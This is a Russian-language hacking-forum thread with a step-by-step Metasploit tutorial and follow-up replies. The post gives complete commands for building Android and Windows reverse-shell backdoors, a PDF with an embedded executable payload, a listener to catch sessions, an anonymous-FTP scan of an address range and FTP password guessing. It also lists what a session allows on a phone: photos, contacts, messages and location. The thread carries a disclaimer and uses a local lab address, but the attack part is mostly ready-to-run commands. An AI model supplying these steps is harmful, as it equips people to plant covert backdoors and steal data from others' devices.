ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Уязвимости CMS / форумов (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Metasploit. Учимся вместе полезным фишкам. (https://forum.antichat.xyz/showthread.php?t=581367)

User17 13.02.2023 19:43

Введение
Рад приветствовать дорогих читателей! Я практически уверен, что все, кто читает данную статью, как минимум слышали про такой замечательный фреймворк как Metasploit. Данный фреймворк хранит в себе довольно богатую базу данных различных уязвимостей на любой вкус и цвет, которые только возможно проэксплуатировать. В этой статье хочу познакомить вас с некоторыми полезными и даже можно выразиться базовыми уязвимостями, которые здорово помогут вам в изучении сферы информационной безопасности и естественно в саморазвитии.

Цитата:


Дисклеймер: Все данные, предоставленные в данной статье, взяты из открытых источников, не призывают к действию и являются только лишь данными для ознакомления, и изучения механизмов используемых технологий.


Практическая часть
Итак, конечно же все действия будут проводиться на моей любимой Kali Linux, тем более там этот фреймворк уже предустановлен, поэтому если что, можно сразу к командам приступать и не париться.

Бэкдор на андроид
Здесь мы будем генерировать полезную нагрузку на андроид устройствах, делается всё довольно просто.

Мы вписываем вот такую команду для генерации:

Код:

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.9 lport= 4444 R> Test.apk
Что же означает данная команда? Давайте разберём!
  • Часть строки, где написано android, указывает на операционную систему, под которую генерируется полезная нагрузка;
  • meterpreter/reverse_tcp означает то, что подключаться к хосту данный бэкдор будет по протоколу tcp;
  • lhost = 192.168.0.9 означает IP хоста, к которому будет подключаться бэкдор. Так как в рамках тестирования и ознакомления всё будет проходить в локальной сети, я ввёл свой локальный IP адрес. Для того, чтобы можно было подключиться из глобальной сети к вам, соответственно, нужен будет глобальный ваш IP адрес и при реверс инжиниринге бэкдора, его будет довольно легко выявить;
  • lport = 4444 это собственно порт, по которому бэкдор будет обращаться к нам;
  • И как не сложно догадаться, в строчке R > Test.apk задаётся название нашей полезной нагрузке.
После того как она сгенерировалась, у вас в каталоге появиться ваш apk файл. Теперь я закидываю бэкдор на тестовое устройство android, но перед тем как его закинуть, нужно подготовиться к ловле сессии в нашем фреймворке. Для этого нам нужно будет его запустить вот этой командой msfconsole.

После того как мы его запустили, нам нужно выбрать нашу полезную нагрузку, а для этого вписываем последовательно следующие команды:

Код:

use exploit/multi/handler
в данной команде мы выбираем эксплоит удалённого доступа

Код:

set payload android/meterpreter/reverse_tcp
здесь мы выбираем платформу и способ подключения

Код:

set lhost 192.168.0.9
задаём наш хост

Код:

set lport 4444
задаём порт

Код:

exploit
ну и собственно запускаем

https://forum.antichat.xyz/attachmen...6302650481.png

Ну теперь я устанавливаю и открываю файл полезной нагрузки, и на экране моментально получаю сессию к моему устройству. Спектр возможностей удалённого доступа здесь весьма обширный. Можно сделать фотку через любую из камер телефона, лазить по директориям и скачивать какие-либо файлы, делать полный дамп номеров в телефонной книге, сообщений и звонков, узнать местоположение и многое многое другое.
Бэкдор на Windows.
Ну здесь всё происходит впринципе аналогичным образом, нужно будет поменять лишь несколько строчек.

Код:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.9 lport= 4444 R> Test2.exe
Команда так же весьма проста и понятна, поэтому переходим сразу к нашему фреймворку. Запускаем его msfconsole.

Ну и далее так же по очереди запускаем следующие команды

Код:


Код:

use exploit/mulit/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.9

set lport 4444

exploit

https://forum.antichat.xyz/attachmen...6302664533.png

Далее аналогичным образом проверяем всё это дело на Windows по средством запуска и сессия готова.
Эксплоит в PDF
Так же для фреймворка не составит труда сгенерировать PDF файл с полезной нагрузкой и аналогичным образом подключиться к нему. Давайте же приступим!

Здесь уже msfvenom нам не понадобиться, будем всё делать прямиком в метасплоите, поэтому снова его запускаем msfconsole.

Далее прописываем вот такие команды:

Код:


Код:

use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
Здесь будет задействован эксполит, который будет встроен в PDF файл

Код:


Код:

set lhost 192.168.0.9

set lport 4444

set filename Test3.pdf

Здесь задаём имя нашему файлу

Код:


Код:

exploit
https://forum.antichat.xyz/attachmen...6302691690.png

Ну и далее генерируется полезная нагрузка в виде файла PDF. Подключиться можно будет так же через multi/handler. То есть просто не выходя из консоли прописываем:

Код:


Код:

use exploit/multi/handler

set lhost 192.168.0.9

set lport 4444

exploit

Ну и ждём сессии.

Вход по ftp
Так же наш фреймворк может спокойно просканировать диапазон IP адресов на возможность подключения к какому-либо с помощью ftp через логин Anonymous

Для этого мы запускаем наш фреймворк msfconsole.

И вводим следующие команды:

Код:


Код:

use auxiliary/scanner/ftp/anonymous
Выбираем наш сканер

Код:


Код:

set RHOSTS 192.168.1.200-254
Выбираем диапазон адресов для сканирования

Код:


Код:

set THREADS 55
run

Ну и собственно далее на экране у нас будут адреса на которых есть ftp и к которым можно подключиться через логин Anonymous без пароля и легко получить доступ.

https://forum.antichat.xyz/attachmen...6302705781.png

Таким же образом можно и подбирать логин с паролем к диапазону адресов, для этого вводим следующие команды:

Код:


Код:

set RHOSTS 192.168.69.50-254
set THREADS 205
set USERNAME msfadmin
set PASSWORD msfadmin
set VERBOSE false
run

https://forum.antichat.xyz/attachmen...6302718311.png

Ну и далее мы увидим адреса на которых есть ftp и к которым можно подключиться используя заданные вами логин и пароль для подбора.
Заключение
Сегодня поведал вам немного о такой волшебной и удивительной штуке как Metasploit Framework. И у него весьма широкий спектр применений, через него можно выполнять практически все ключевые задачи в тестировании чего-либо на уязвимость, но опять же повторюсь, что данная статья не побуждает к злонамеренным действиям и несёт лишь ознакомительный характер.

Дядюшка Рик 26.02.2023 12:44

Красава кхм кхм кхм дядюшка Рик одобряет

piok 03.03.2023 11:45

Добрый день, я так скажем начинающий ИБ, которому нравится вся эта движуха
Подскажите пожалуйста, я уже пользовался msfvenom и такой вопрос.
Для чего использовать ключ (флаг) R > если существует ключ(флаг) -o которая позволяет также полезную нагрузку пихать в создаваемый файл? Можете пожалуйста немного рассказать в чём разница данных флагов?
Спасибо.

B13 03.03.2023 17:04

Цитата:


piok сказал(а):

Добрый день, я так скажем начинающий ИБ, которому нравится вся эта движуха
Подскажите пожалуйста, я уже пользовался msfvenom и такой вопрос.
Для чего использовать ключ (флаг) R > если существует ключ(флаг) -o которая позволяет также полезную нагрузку пихать в создаваемый файл? Можете пожалуйста немного рассказать в чём разница данных флагов?
Спасибо.


man msfvenom пробовали команду?

piok 03.03.2023 22:13

Цитата:


B13 сказал(а):

man msfvenom пробовали команду?


Добрый день, спасибо за ответ. Да, выводит описание использования утилиты и описание флагов. Посмотрел внимательно, там нет описание на счет флага "R". Если смотреть на Example, то там пример использования утилиты с флагом "-o". Что на счет стрелки ">", то это я как понимаю выходной поток выполненной команды в файл. По типу ">>". Если не ошибаюсь конечно.
Спасибо.
С уважением, Евгений.

bigboss3000 14.03.2023 00:50

Замени use exploit/mulit/handler на use exploit/multi/handler и не позорься, а так статья норм

User17 14.03.2023 04:43

Цитата:


bigboss3000 сказал(а):

Замени use exploit/mulit/handler на use exploit/multi/handler и не позорься, а так статья норм


Благодарю,уже исправил

Telly 30.07.2023 02:13

Приветствую! Ситуация следующая, создаю пейлоад по шагам выше, загружаю на свой телефон - выдает ошибку "Это приложение было создано для более ранней версии Android". Сессия не создается. Подскажите пожалуйста, как исправить?

Тестировал на 11 андройде, создавал на Kali (VB). Kali обновлял

delifer 30.07.2023 03:15

Цитата:


bigboss3000 сказал(а):

Замени use exploit/mulit/handler на use exploit/multi/handler и не позорься, а так статья норм


а в чем позор?

User17 03.08.2023 19:44

Цитата:


Telly сказал(а):

Приветствую! Ситуация следующая, создаю пейлоад по шагам выше, загружаю на свой телефон - выдает ошибку "Это приложение было создано для более ранней версии Android". Сессия не создается. Подскажите пожалуйста, как исправить?

Тестировал на 11 андройде, создавал на Kali (VB). Kali обновлял


Пейлоад создается к сожалению только на версии Android раньше 11ой


Время: 19:23